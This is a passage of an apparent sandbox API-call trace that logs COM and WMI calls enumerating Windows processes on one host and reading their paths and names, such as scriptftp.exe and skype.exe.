[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb130) returned 0x0 [0225.515] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb130, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.515] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb130, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec25a8) returned 0x0 [0225.515] WbemDefPath:IUnknown:Release (This=0x5ebb130) returned 0x0 [0225.515] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec25a8) returned 0x0 [0225.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.516] WbemDefPath:IUnknown:AddRef (This=0x5ec25a8) returned 0x3 [0225.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb140) returned 0x0 [0225.516] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb140, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.516] WbemDefPath:IUnknown:Release (This=0x5ebb140) returned 0x3 [0225.516] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.516] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.516] WbemDefPath:IUnknown:Release (This=0x5ec25a8) returned 0x2 [0225.516] WbemDefPath:IUnknown:Release (This=0x5ec25a8) returned 0x1 [0225.516] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.516] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec25a8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec25a8) returned 0x0 [0225.517] WbemDefPath:IUnknown:AddRef (This=0x5ec25a8) returned 0x3 [0225.517] WbemDefPath:IUnknown:Release (This=0x5ec25a8) returned 0x2 [0225.517] WbemDefPath:IWbemPath:SetText (This=0x5ec25a8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1460\"") returned 0x0 [0225.517] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.517] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.517] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.517] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.517] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.517] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.517] IWbemClassObject:Get (in: This=0x5ebc6b8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f5ba8*=0, plFlavor=0x26f5bac*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x26f5ba8*=8, plFlavor=0x26f5bac*=0) returned 0x0 [0225.517] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0225.517] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0225.517] IWbemClassObject:Get (in: This=0x5ebc6b8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f5ba8*=8, plFlavor=0x26f5bac*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x26f5ba8*=8, plFlavor=0x26f5bac*=0) returned 0x0 [0225.517] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0225.517] SysStringByteLen (bstr="scriptftp.exe") returned 0x1a [0225.517] CoTaskMemAlloc (cb=0x4) returned 0x5ebb170 [0225.517] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb170, puReturned=0x26dde18 | out: apObjects=0x5ebb170*=0x5ebc850, puReturned=0x26dde18*=0x1) returned 0x0 [0225.519] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc850) returned 0x0 [0225.519] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.519] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.519] IUnknown:AddRef (This=0x5ebc850) returned 0x3 [0225.519] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.519] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.519] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc854) returned 0x0 [0225.519] IMarshal:GetUnmarshalClass (in: This=0x5ebc854, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.519] IUnknown:Release (This=0x5ebc854) returned 0x3 [0225.519] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.520] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.520] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.520] IUnknown:Release (This=0x5ebc850) returned 0x2 [0225.520] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.520] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.520] IUnknown:QueryInterface (in: This=0x5ebc850, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc850) returned 0x0 [0225.520] IUnknown:AddRef (This=0x5ebc850) returned 0x4 [0225.520] IUnknown:Release (This=0x5ebc850) returned 0x3 [0225.520] IUnknown:Release (This=0x5ebc850) returned 0x2 [0225.520] CoTaskMemFree (pv=0x5ebb170) [0225.520] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.520] IUnknown:AddRef (This=0x5ebc850) returned 0x3 [0225.520] IWbemClassObject:Get (in: This=0x5ebc850, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.521] IWbemClassObject:Get (in: This=0x5ebc850, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1856\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.521] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1856\"") returned 0x66 [0225.521] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1856\"") returned 0x66 [0225.521] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.521] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.521] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.521] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.522] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb170) returned 0x0 [0225.522] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb170, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.522] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb170, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2688) returned 0x0 [0225.523] WbemDefPath:IUnknown:Release (This=0x5ebb170) returned 0x0 [0225.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2688) returned 0x0 [0225.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.523] WbemDefPath:IUnknown:AddRef (This=0x5ec2688) returned 0x3 [0225.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb180) returned 0x0 [0225.523] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb180, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.523] WbemDefPath:IUnknown:Release (This=0x5ebb180) returned 0x3 [0225.523] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.523] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.524] WbemDefPath:IUnknown:Release (This=0x5ec2688) returned 0x2 [0225.524] WbemDefPath:IUnknown:Release (This=0x5ec2688) returned 0x1 [0225.524] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.524] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2688, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2688) returned 0x0 [0225.524] WbemDefPath:IUnknown:AddRef (This=0x5ec2688) returned 0x3 [0225.524] WbemDefPath:IUnknown:Release (This=0x5ec2688) returned 0x2 [0225.524] WbemDefPath:IWbemPath:SetText (This=0x5ec2688, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1856\"") returned 0x0 [0225.524] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.524] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.524] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.524] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.524] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.524] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.524] IWbemClassObject:Get (in: This=0x5ebc850, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f641c*=0, plFlavor=0x26f6420*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x26f641c*=8, plFlavor=0x26f6420*=0) returned 0x0 [0225.524] SysStringByteLen (bstr="skype.exe") returned 0x12 [0225.524] SysStringByteLen (bstr="skype.exe") returned 0x12 [0225.524] IWbemClassObject:Get (in: This=0x5ebc850, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f641c*=8, plFlavor=0x26f6420*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x26f641c*=8, plFlavor=0x26f6420*=0) returned 0x0 [0225.524] SysStringByteLen (bstr="skype.exe") returned 0x12 [0225.525] SysStringByteLen (bstr="skype.exe") returned 0x12 [0225.525] CoTaskMemAlloc (cb=0x4) returned 0x5ebb1b0 [0225.525] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb1b0, puReturned=0x26dde18 | out: apObjects=0x5ebb1b0*=0x5ebc9e8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.528] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc9e8) returned 0x0 [0225.528] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.528] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.529] IUnknown:AddRef (This=0x5ebc9e8) returned 0x3 [0225.529] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.529] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.529] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc9ec) returned 0x0 [0225.529] IMarshal:GetUnmarshalClass (in: This=0x5ebc9ec, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.529] IUnknown:Release (This=0x5ebc9ec) returned 0x3 [0225.529] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.529] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.529] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.529] IUnknown:Release (This=0x5ebc9e8) returned 0x2 [0225.529] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.529] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.529] IUnknown:QueryInterface (in: This=0x5ebc9e8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc9e8) returned 0x0 [0225.529] IUnknown:AddRef (This=0x5ebc9e8) returned 0x4 [0225.529] IUnknown:Release (This=0x5ebc9e8) returned 0x3 [0225.529] IUnknown:Release (This=0x5ebc9e8) returned 0x2 [0225.529] CoTaskMemFree (pv=0x5ebb1b0) [0225.529] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.529] IUnknown:AddRef (This=0x5ebc9e8) returned 0x3 [0225.530] IWbemClassObject:Get (in: This=0x5ebc9e8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.530] IWbemClassObject:Get (in: This=0x5ebc9e8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2312\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.530] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2312\"") returned 0x66 